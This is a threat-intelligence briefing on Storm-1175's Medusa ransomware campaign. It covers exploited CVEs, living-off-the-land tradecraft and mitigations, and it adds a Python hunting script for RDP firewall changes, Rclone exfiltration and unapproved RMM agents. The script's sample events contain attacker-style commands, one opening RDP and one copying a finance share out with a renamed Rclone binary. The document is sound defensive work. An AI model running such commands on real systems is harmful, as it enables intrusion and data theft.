Malware | Critical

China-Linked Storm-1175 Deploys Medusa Ransomware via Zero-Day Exploit Chains

Wednesday, April 8, 2026
Australia, United Kingdom, United States
The Hacker News + Microsoft Threat Intelligence

Summary

China-linked threat actor Storm-1175 is conducting high-velocity ransomware attacks by chaining zero-day and N-day vulnerabilities to deploy Medusa ransomware against healthcare, education, professional services, and finance sectors. The group can complete full data exfiltration and ransomware deployment within 24 hours of initial access. Targets span Australia, the United Kingdom, and the United States.

Threat Analysis

Storm-1175 is a financially motivated cybercriminal group with ties to China that Microsoft Threat Intelligence has tracked since 2023 for 'high-velocity' intrusions. The group exploits internet-facing systems using a combination of zero-day and recently disclosed N-day vulnerabilities, sometimes chaining multiple exploits to gain and then extend access. Since 2023 it has been linked to exploitation of more than 16 vulnerabilities, including CVE-2025-10035 (Fortra GoAnywhere MFT), CVE-2026-23760 (SmarterTools SmarterMail), and CVE-2026-1731 (BeyondTrust). CVE-2025-10035 and CVE-2026-23760 were exploited as zero-days, before public disclosure, so patching alone could not have prevented those initial compromises; exposure reduction and post-exploitation detection matter as much as patch cadence for edge appliances.

Post-compromise activity relies on living-off-the-land binaries and dual-use tooling rather than custom malware: PowerShell, PsExec, and Impacket for execution and lateral movement, PDQ Deployer for lateral movement (pushing payloads to many hosts at once), Windows Firewall rule changes to open RDP, Mimikatz for credential dumping, and Rclone for bulk data exfiltration. The group also installs legitimate remote monitoring and management (RMM) agents (AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect) so that its command-and-control traffic blends in with sanctioned administrative tooling.

Mitigations: Patch all internet-facing systems immediately, prioritizing file transfer and remote access products such as those listed above. Implement behavioral monitoring for LOLBin abuse, including firewall rule changes that enable RDP, credential-dumping tool execution, and Rclone activity. Restrict RMM tools to approved vendors only and alert on any other agent appearing on endpoints. Maintain offline backups and test restoration procedures; with exfiltration and encryption completed within 24 hours of initial access, there is little time to respond once the intrusion is under way.
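As an added illustration of the behavioral monitoring recommended above (example code written for this page, not from the original briefing or from Microsoft's own detections), the following Python script runs three hunts over constructed Sysmon-style process-creation events: Windows Firewall changes that open RDP, Rclone execution (including a renamed binary, caught through the PE OriginalFileName field), and RMM agents outside an allowlist. The event format, the approved-RMM allowlist, and the sample records are all assumptions made for the example.

```python
"""Hunt Storm-1175-style post-compromise behaviour in process-creation events.

Added example for this page, not the briefing's or Microsoft's own detection logic.
Assumes Sysmon Event ID 1-style records (Computer, User, Image, OriginalFileName,
CommandLine) exported as JSON lines; SAMPLE_EVENTS below is constructed.
"""
from __future__ import annotations

import json
import re
from pathlib import PureWindowsPath

# Hypothetical allowlist: the one RMM agent this environment sanctions.
APPROVED_RMM = {"screenconnect.clientservice.exe"}

# Agents the briefing says Storm-1175 abuses for camouflage, keyed by image name.
RMM_IMAGES = {
    "anydesk.exe": "AnyDesk",
    "ateraagent.exe": "Atera",
    "meshagent.exe": "MeshAgent",
    "screenconnect.clientservice.exe": "ConnectWise ScreenConnect",
}

# Windows Firewall changes that expose RDP, via netsh or the NetSecurity cmdlets.
RDP_FIREWALL = [
    re.compile(r"netsh\s+advfirewall\s+firewall\s+(?:add|set)\s+rule.*?"
               r"(?:remote\s*desktop|localport=3389)", re.I),
    re.compile(r"(?:Enable|Set)-NetFirewallRule.*?remote\s*desktop", re.I),
]

# Rclone syntax: "<verb> <local path> <remote>:<path>" plus a typical flag.
RCLONE_VERB = re.compile(r"\b(?:copy|sync|move|moveto)\b\s+\S+\s+\S+:", re.I)
RCLONE_FLAG = re.compile(r"--(?:config|transfers|bwlimit|no-check-certificate)\b", re.I)

# Constructed sample: one benign service start, then the behaviours of interest.
SAMPLE_EVENTS = r"""
{"Computer":"FS01","User":"CORP\\svc_backup","Image":"C:\\Windows\\System32\\svchost.exe","OriginalFileName":"svchost.exe","CommandLine":"C:\\Windows\\System32\\svchost.exe -k netsvcs -p"}
{"Computer":"FS01","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\netsh.exe","OriginalFileName":"netsh.exe","CommandLine":"netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"}
{"Computer":"FS01","User":"CORP\\jdoe","Image":"C:\\ProgramData\\svchost.exe","OriginalFileName":"rclone.exe","CommandLine":"svchost.exe copy C:\\Shares\\Finance remote:staging --transfers 32 --config C:\\ProgramData\\r.conf"}
{"Computer":"WS17","User":"CORP\\jdoe","Image":"C:\\Users\\Public\\AnyDesk.exe","OriginalFileName":"AnyDesk.exe","CommandLine":"C:\\Users\\Public\\AnyDesk.exe --service"}
{"Computer":"WS17","User":"NT AUTHORITY\\SYSTEM","Image":"C:\\Program Files (x86)\\ScreenConnect Client (a1b2)\\ScreenConnect.ClientService.exe","OriginalFileName":"ScreenConnect.ClientService.exe","CommandLine":"\"C:\\Program Files (x86)\\ScreenConnect Client (a1b2)\\ScreenConnect.ClientService.exe\""}
{"Computer":"WS17","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -nop -c \"Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'\""}
"""


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if absent)."""
    return PureWindowsPath(path).name.lower() if path else ""


def classify(ev: dict) -> list[tuple[str, str]]:
    """Return (rule, detail) pairs that fire for one event."""
    image = image_name(ev.get("Image", ""))
    original = (ev.get("OriginalFileName") or "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []

    if any(p.search(cmd) for p in RDP_FIREWALL):
        hits.append(("rdp_firewall_opened", cmd))

    # Match Rclone by file name, by PE OriginalFileName (survives a rename), or by syntax.
    if "rclone.exe" in (image, original) or (RCLONE_VERB.search(cmd) and RCLONE_FLAG.search(cmd)):
        hits.append(("rclone_exfil", f"{image} (OriginalFileName={original or '?'})"))

    if image in RMM_IMAGES and image not in APPROVED_RMM:
        hits.append(("unapproved_rmm", RMM_IMAGES[image]))
    return hits


def load_events(jsonl: str) -> list[dict]:
    """Parse JSON-lines export into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def hunt(events: list[dict]) -> list[dict]:
    """Run classify() over every event; one finding per rule hit."""
    return [
        {"event": i, "host": ev.get("Computer"), "user": ev.get("User"), "rule": rule, "detail": detail}
        for i, ev in enumerate(events)
        for rule, detail in classify(ev)
    ]


if __name__ == "__main__":
    for f in hunt(load_events(SAMPLE_EVENTS)):
        print(f"[{f['rule']}] event {f['event']} on {f['host']} as {f['user']}: {f['detail']}")
```

The OriginalFileName check is what catches the Rclone copy renamed to svchost.exe in the sample; an attacker can also strip or edit the PE version resource, so in production pair this with the syntax match shown and with image hash or signer checks rather than relying on any one field. The RMM allowlist is deliberately an exact image-name set so that a second, unexpected copy of an approved tool running from an unusual path can be added as its own rule.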

Last updated: Apr 8, 2026, 08:18 AM
